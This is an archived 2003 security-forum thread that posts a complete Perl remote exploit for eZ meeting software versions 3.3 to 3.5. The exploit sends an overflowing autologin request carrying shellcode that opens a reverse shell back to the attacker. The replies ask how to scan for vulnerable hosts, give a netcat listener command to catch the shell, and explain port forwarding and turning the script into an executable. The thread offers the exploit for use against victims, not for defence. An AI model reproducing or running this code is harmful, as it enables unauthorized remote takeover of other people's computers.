Universal Ez V3.3 < V3.5 Remote Exploit

Full Version: Universal Ez V3.3 < V3.5 Remote Exploit

GovernmentSecurity.org > The Archives > Exploit Articles

GaLiaRePt

Dec 17 2003, 09:29 PM

Universal eZ v3.3 < v3.5 remote exploit
Date: 2003-12-17

Author : Iván Rodriguez Almuiña <kralor_@_coromputer.net>
Download : http://www.security-corporation.com/downlo...oit/eZXploit.pl

CODE

#!/usr/bin/perl -w
######################C###O###R###O###M###P###U###T###E###R#####################
#
# [Crpt] universal eZ v3.3 < v3.5 remote exploit by kralor [Crpt] #
#-------------------------------------------------------------------------------#
# versions tested & not vulnerables: v3.0 v3.1 v3.2 #
# versions tested & vulnerables: v3.3 v3.4 v3.5 #
# Cryptso.dll contains a 'static' jmp esp in eZnetwork pack from v3.3 to v3.5 #
# It is a trivial exploit, jumping to esp, then at esp we jump backward to #
# finally reach the shellcode. The shellcode gives a reverse remote shell. #
# Universal shellcode coded by kralor with the PEB technic. #
######W###W###W###.###C###O###R###O###M###P###U###T###E###R###.###N###E###T######
use IO::Socket;

print "\r\n\t [Crpt] eZ v3.3 < v3.5 remote exploit by kralor [Crpt]\r\n";
print "\t\twww.coromputer.net && undernet #coromputer\r\n\r\n";

if(@ARGV<3||@ARGV>3) {
print "syntax: ".$0." <victim> <your_ip> <your_port>\r\n";
exit;
}

print "[+] Connecting to ".$ARGV[0]."\t...";

my $sock = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>"80");
if(!$sock) {
print "Error\r\n";
exit;
}

print "Done\r\n";

# 0xffe4 jmp esp in Cryptso.dll (v3.3 v3.4 v3.5 @ 0x1004C72B)
# 0xffffedffe9 jmp back ( $ - 4'608)

$eip = "\x2B\xC7\x04\x10";
$jmp_back = "\xE9\xFF\xED\xFF\xFF";
# universal reverse remote shell using PEB, coded by kralor.
$shellc0deI = "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef".
"\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\x9e\x01\x80\x33\x95".
"\x43\xe2\xfa\x7e\xe6\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e".
"\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad".
"\x8b\xe0\xd9\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d".
"\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96".
"\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3".
"\xae\xe1\xb1\x8d\xe1\x9f\xde\xb6\x4e\xe0\x7f\xcd\xcd\xa6\x55\x56".
"\xca\xa6\x5c\xf3\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e".
"\x8d\x1e\x56\xae\x54\xe0\x08\x56\xa6\x4e\xfd\xec\xd0\xed\xd4\xff".
"\x9f\xff\xde\xc6\x7d\xe9\x6a\x6a\x6a\xa6\x5c\x52\xd0\x69\xe2\xe6".
"\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8\x97\x1e\x48\xf3\x16\x7e".
"\x91\xc4\xc4\xc6\x6a\x45\xa6\x4e\x1c\xd0\x91\xfd\xe7\xf0\xe6\xe6".
"\xff\x9f\xff\xde\xc6\x7d\xde\x6a\x6a\x6a\x1e\xc8\x91\xa6\x6a\x52".
"\xd0\x69\xc2\xc6\xd4\xc6\x52\xd0\x95\xfa\xf6\xfe\xf0\x1c\xe8\x91".
"\xf3\x52\xd0\x91\xe1\xd4\x1e\x58\xf3\x16\x7c\x91\xc4\xc6\x6a\x45".
"\xa6\x4e\xc6\xc6\xc6\xc6\xd6\xc6\xd6\xc6\x6a\x45\x1c\xd0\x31\xfd".
"\xfb\xf0\xf6\xe1\xff\x96\xff\xc6\xff\x97\x7d\x93\x6a\x6a\x6a\xa6".
"\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97";
$shellc0deII = "\xff\x85\xc0\x6a\xe0\x31\x6a\x45\xa6".
"\x4e\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xc6\x7d\x40\x6b\x6a\x6a".
"\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d\x1c".
"\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52\xd0".
"\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xc8\x31\x1c\xc8".
"\x71\x1c\xc8\x7d\x1c\xc8\x79\xa6\x4e\x18\xd8\x65\xc4\x18\xd8\x39".
"\xc4\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52".
"\xd0\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xa6\x4e".
"\xfd\xed\xfc\xe1\xc5\xff\x94\xff\xde\xc6\x7d\xf3\x6b\x6a\x6a\x6a".
"\x45\x95";
my $tip = inet_aton($ARGV[1]);
my $paddr = sockaddr_in($ARGV[2], $tip);

$paddr=substr($paddr,2,6);
$paddr=$paddr^"\x95\x95\x95\x95\x95\x95";
my $rport=substr($paddr,0,2);
my $rip=substr($paddr,2,4);

$request = "GET /SwEzModule.dll?operation=login&autologin=".
"\x90"x100 .$shellc0deI.$rport."\x96\x46\x52\x97".$rip.$shellc0deII.
"\x90"x4103 .$eip."\x90"x4 .$jmp_back." HTTP/1.0\r\n\r\n";

print $sock $request;
print "[+] Sending evil request\t...";
close($sock);
print "Done\r\n";
exit;

Enjoy ;-)

cyrixx

Dec 18 2003, 05:39 AM

yeeahh, another one by kralor

i'll test it after work! big thx!

Uli

Dec 18 2003, 05:58 AM

n00b question but what is the target envirronment?

ArEs

Dec 18 2003, 03:22 PM

QUOTE

Notebook / Desktop PCs
. Microsoft® Windows® XP
. Microsoft® Windows® 2000 Service Pack 1 & 2
. Microsoft® Windows® NT
. Microsoft® Windows® Me
. Microsoft® Windows® 98

Tablet PCs
. Microsoft® Windows® XP Tablet PC

from the requierements site of the company

( http://www.ezmeeting.com/Products_SysReq.html )

ivan288

Dec 18 2003, 05:00 PM

nice one. anyone know how to scan boxes with e.z. on it?

i searched the site and this is what i found:
eZnetwork registration, authentication and discovery
ports 443 (HTTPS) and 8001, 8081, or 8080 (HTTP), Outgoing Only

do we need to scan for port 443?

zarp

Dec 18 2003, 05:20 PM

I thinks that there is not so much target which have ez and port 445 8080 8081 are use for many app ...

cyrixx

Dec 18 2003, 05:40 PM

http://www.ezmeeting.com/PDF/eZConnectivityGuide.pdf

port 10105 data ?!

ivan288

Dec 18 2003, 05:49 PM

a very nooby question but would appreciate it if someone could help.

it says :"<victim> <your_ip> <your_port>"

but what port do i put??

cyrixx

Dec 18 2003, 05:57 PM

nc -L -vv -p 1234
it's just an example

let netcat listen on any port

sorry for my englisch

zarp

Dec 18 2003, 06:55 PM

"on any port" éhéh in most of remote the port is specify how the victime could connect ohne give him the port so must have a port to specify

PEB technic?

Lanig

Dec 18 2003, 07:01 PM

also if u have a router make sure u will forward the port u choose or else it will block it...
then execute nc.exe -L -vv -p [port] as someone else said...

mkwento

Dec 18 2003, 08:18 PM

wowwww good job !!!

SkyRaVeR

Dec 18 2003, 08:39 PM

uhm - what 'bout looking in the code??

my $sock = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>"80");

tells us xploit will connect 2 ?? naaah? well, why sends it malcios html commands? uhm - port 80 ?

oooh w33d ! put it in tha air!

enjoy

phrozen77

Dec 19 2003, 02:01 AM

QUOTE

can some one compile the code for me please

<flame_because_of_total_ignorance>

1. someone seeing a exploit that seems to be sourcecode
2. "omfg maybe i can hack some str0s with that"
3. "damn, its source - no .exe! :/"
4. just didnt read forums disclaimers and not knowing that compilation requests arent allowed AND dont have a ****ing clue about what perl is
5. asking stupid questions like "can some1 compile it for me?"
6. getting flamed for doing so....

</flame_because_of_total_ignorance>

just to enlighten yourself a bit...

perl is portable code (*nix/w32/...) and doesnt need to be compiled but INTERPRETED...

so you might ask "where to find a interpreter for this one" instead...

well...

here you go

http://www.activestate.com/Products/ActivePerl/

(yes, you have to click on the download button & installing it _yourself_)

SCNR

<edit>
dissolutions seemed to have read the thread almost at the same time and removed the post stated above.. feel free to remove my post also

)
</edit>

vnet576

Dec 19 2003, 02:28 AM

Some of you might really like exe files, I'm one of them, so u use this program:

http://www.indigostar.com/perl2exe.htm

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.